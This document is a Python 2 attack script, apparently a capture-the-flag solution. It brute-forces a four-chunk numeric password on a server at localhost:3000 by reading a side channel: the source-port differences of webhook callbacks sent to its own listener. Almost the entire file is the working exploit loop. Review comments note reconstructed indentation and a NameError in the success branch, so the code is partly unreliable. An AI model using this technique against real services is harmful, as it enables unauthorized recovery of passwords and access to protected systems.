#!/usr/bin/env python
import socket
import json
import urllib2
import sys
HOST = ''  # empty host: the listener binds to every local interface
PORT = 50132  # listener port; also the port given to the server in the "webhooks" field
VICTIM = 'http://localhost:3000'  # URL that guess() submits each candidate to
old_port = 1  # source port of the previous inbound connection
current_diff = 2  # port difference expected while the chunk being worked on is still wrong
current_errors = 0  # how often the difference came in one below current_diff (possible false positive)
error_limit = 4  # after this many such observations, back off to the previous chunk
guesses = [0] * 4  # candidate value for each of the four password chunks
current_guess = 0  # index into guesses of the chunk being worked on
def build_password():
    """Concatenate the four chunk values in ``guesses`` into one candidate string.

    Each chunk is rendered with ``str()`` and left-padded with zeros to three
    characters (values below 10 get "00", values below 100 get "0"); anything
    larger is appended unpadded. Only the first four entries of ``guesses``
    are used.
    """
    def render(value):
        # pad by magnitude so every chunk occupies three places
        if value < 10:
            return "00" + str(value)
        if value < 100:
            return "0" + str(value)
        return str(value)

    return "".join(render(guesses[index]) for index in range(4))
def guess():
    """Submit the current candidate to VICTIM and discard the HTTP response body.

    The request body is a JSON document assembled by string concatenation
    rather than ``json.dumps``; the candidate comes from build_password(),
    which emits only zero-padded decimal digits, and the "webhooks" entry
    points back at this script's own listener on PORT.
    """
    candidate = build_password()
    print 'guessing', candidate
    payload = '{"password": "' + candidate + '", "webhooks": ["localhost:' + str(PORT) + '"]}'
    response = urllib2.urlopen(urllib2.Request(VICTIM, payload))
    # the body is read to completion but its content is not examined here
    response.read()
def increment_guess():
    """Bump the value of the chunk selected by ``current_guess`` by one.

    Exits the process once that chunk's value reaches 1000, i.e. the values
    0 through 999 have all been used for it.
    """
    slot = current_guess
    guesses[slot] = guesses[slot] + 1
    if guesses[slot] == 1000:
        # the chunk's value space is exhausted; the search cannot continue
        print 'something went wrong'
        sys.exit()
if __name__ == '__main__':
    # NOTE(review): this copy of the script has lost its indentation; the
    # nesting below is reconstructed from the control flow and should be
    # confirmed against the original.
    #
    # Accept loop. Each iteration submits one candidate via guess(), then waits
    # for the server to connect back to PORT (the address handed to it in the
    # request's "webhooks" field). The difference between successive inbound
    # source ports is the only signal the search uses; per the inline comments
    # below it is read as how far into the candidate the server got before
    # rejecting it. That signal only exists while the server's outbound
    # activity varies with how much of the candidate was right — presumably a
    # server that validates the whole secret in one step gives nothing usable.
    # listen for webhooks
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((HOST, PORT))  # HOST is '' so this listens on all interfaces
    s.listen(1)
    while 1:
        guess()
        # wait for connection
        conn, addr = s.accept()
        print 'connected by', addr,  # trailing comma: next print stays on this line
        new_port = addr[1]  # source port of the peer that just connected
        diff = new_port - old_port
        print "port diff", str(diff),
        old_port = new_port
        old_diff = diff  # assigned but never read
        #check if we have incremented prematurely and received a false positive
        if diff == current_diff - 1:
            current_errors += 1
            if current_errors == error_limit:
                print "hit error limit, reducing current diff"
                # back off: clear the chunk being worked on and return to the
                # previous chunk
                current_diff -= 1
                guesses[current_guess] = 0
                current_guess -= 1
                current_errors = 0
                print "current_diff is now", current_diff
                print "current_guess is now", current_guess
        # A diff of 2..5 is mapped to a chunk; the chunk's value is advanced
        # only when that chunk is the one currently being worked on.
        if diff == 2: # failed on 1st try
            if current_guess == 0:
                increment_guess()
        elif diff == 3: # failed on 2nd try
            if current_guess == 1:
                increment_guess()
        elif diff == 4: # failed on 3rd try
            if current_guess == 2:
                increment_guess()
        elif diff == 5: # failed on 4th try, or success
            if current_guess == 3:
                increment_guess()
        else:
            #if we have not gotten a proper port difference try again
            # NOTE(review): conn is not closed on this path, so the accepted
            # socket is left open until it is garbage-collected.
            continue
        #move on to the next octet if the port difference has increased by 1
        if current_diff + 1 == diff:
            current_guess += 1
            current_diff += 1
            print 'current_guess is', current_guess
            print 'current_diff is', current_diff
        # Read the start of the inbound request and look for a JSON body after
        # the blank line that separates headers from body; a request larger
        # than 1024 bytes is only partially read.
        data = conn.recv(1024)
        if data:
            body = data.split('\r\n\r\n')
            if len(body) > 1:
                result = json.loads(body[1])
                if result['success']:
                    # NOTE(review): `password` is not bound in this scope (it is
                    # a local of guess()), so this line raises NameError.
                    print 'SUCCESS:', password
                    sys.exit()
                else:
                    print body
        conn.close()